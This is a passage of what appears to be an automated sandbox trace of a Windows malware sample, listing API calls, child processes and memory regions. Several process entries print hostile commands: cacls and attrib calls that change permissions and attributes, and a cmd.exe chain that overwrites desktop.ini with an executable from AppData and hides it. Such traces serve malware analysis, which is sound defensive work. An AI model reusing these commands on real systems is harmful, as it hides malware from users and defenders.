(_String1="CACLS", _String2="CD") returned -3 [0216.189] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0216.189] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0216.190] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0216.190] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0216.190] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0216.190] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0216.190] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0216.190] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0216.190] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0216.190] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0216.190] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0216.190] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0216.190] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0216.190] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0216.190] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0216.190] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0216.190] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0216.190] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0216.190] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0216.190] 
_wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0216.190] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0216.190] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0216.190] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0216.190] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0216.190] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0216.190] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0216.190] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0216.191] SetErrorMode (uMode=0x0) returned 0x0 [0216.191] SetErrorMode (uMode=0x1) returned 0x0 [0216.191] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e1d98, lpFilePart=0x20f0ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f0ec*="Desktop") returned 0x18 [0216.191] SetErrorMode (uMode=0x0) returned 0x1 [0216.191] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.191] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.196] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.197] FindClose (in: hFindFile=0x3e1f70 | out: hFindFile=0x3e1f70) returned 1 [0216.197] FindClose (in: hFindFile=0x3e1f70 | out: hFindFile=0x3e1f70) returned 1 [0216.198] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.198] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.198] GetConsoleTitleW (in: 
lpConsoleTitle=0x20f360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.198] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2b0 | out: lpAttributeList=0x20f1e8, lpSize=0x20f2b0) returned 1 [0216.198] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e8, lpPreviousValue=0x0) returned 1 [0216.198] GetStartupInfoW (in: lpStartupInfo=0x20f1a4 | out: lpStartupInfo=0x20f1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.198] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.199] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f290 | out: lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f290*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbc8, dwThreadId=0xbf0)) returned 1 
[0216.201] CloseHandle (hObject=0x4c) returned 1 [0216.201] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.201] GetEnvironmentStringsW () returned 0x3e0208* [0216.202] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.202] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0216.269] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f184 | out: lpExitCode=0x20f184*=0x0) returned 1 [0216.269] CloseHandle (hObject=0x50) returned 1 [0216.269] _vsnwprintf (in: _Buffer=0x20f2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f190 | out: _Buffer="00000000") returned 8 [0216.269] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.269] GetEnvironmentStringsW () returned 0x3e21b0* [0216.270] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.270] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.270] GetEnvironmentStringsW () returned 0x3e21b0* [0216.270] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.270] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e8 | out: lpAttributeList=0x20f1e8) [0216.270] GetConsoleTitleW (in: lpConsoleTitle=0x20f5cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.270] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.270] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.270] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.270] FindClose (in: hFindFile=0x3de400 | out: hFindFile=0x3de400) returned 1 [0216.271] FindClose (in: hFindFile=0x3de400 | out: hFindFile=0x3de400) returned 1 [0216.271] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 
[0216.271] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.271] GetConsoleTitleW (in: lpConsoleTitle=0x20f360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.271] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2b0 | out: lpAttributeList=0x20f1e8, lpSize=0x20f2b0) returned 1 [0216.271] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e8, lpPreviousValue=0x0) returned 1 [0216.271] GetStartupInfoW (in: lpStartupInfo=0x20f1a4 | out: lpStartupInfo=0x20f1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.271] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.271] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f290 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessInformation=0x20f290*(hProcess=0x4c, 
hThread=0x50, dwProcessId=0xbdc, dwThreadId=0xb9c)) returned 1 [0216.273] CloseHandle (hObject=0x50) returned 1 [0216.273] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.273] GetEnvironmentStringsW () returned 0x3e21b0* [0216.273] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.273] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0216.387] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f184 | out: lpExitCode=0x20f184*=0x0) returned 1 [0216.387] CloseHandle (hObject=0x4c) returned 1 [0216.387] _vsnwprintf (in: _Buffer=0x20f2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f190 | out: _Buffer="00000000") returned 8 [0216.387] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.387] GetEnvironmentStringsW () returned 0x3e21b0* [0216.387] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.387] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.387] GetEnvironmentStringsW () returned 0x3e21b0* [0216.387] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.387] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e8 | out: lpAttributeList=0x20f1e8) [0216.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.388] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0216.388] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.388] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0216.388] SetConsoleInputExeNameW () returned 0x1 [0216.388] GetConsoleOutputCP () returned 0x1b5 [0216.388] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0216.388] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.388] exit (_Code=0) Process: id = "547" image_name = "cacls.exe" filename = 
"c:\\windows\\system32\\cacls.exe" page_root = "0x7ea166c0" os_pid = "0xbc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "546" os_parent_pid = "0x53c" cmd_line = "CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32135 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32138 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32139 start_va = 0x610000 end_va = 0x618fff entry_point = 0x610000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 32140 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32141 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" 
(normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32142 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32143 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32144 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32147 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32148 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32149 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 32150 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32151 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32152 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 32153 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32155 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32156 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 749 os_tid = 0xbf0 Thread: id = 750 os_tid = 0xbf8 Process: id = "548" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "546" os_parent_pid = "0x53c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32157 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32158 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32159 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32160 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 32161 start_va = 0xf60000 end_va = 0xf66fff entry_point = 0xf60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32162 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32163 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32164 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32165 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32166 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32167 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32168 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32169 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32170 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32171 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 32172 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32173 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32174 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32175 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32176 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32177 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32178 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32179 start_va = 0x76b40000 end_va = 
0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32180 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32181 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32182 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32183 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32184 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 32185 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32186 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 751 os_tid = 0xb9c Process: id = "549" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32207 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32208 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32209 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32210 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 32211 start_va = 0x4a350000 end_va = 0x4a39bfff entry_point = 0x4a350000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32212 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32213 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32214 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32215 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 32216 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32265 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32266 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32267 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32268 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 32269 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 32270 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32271 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32272 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
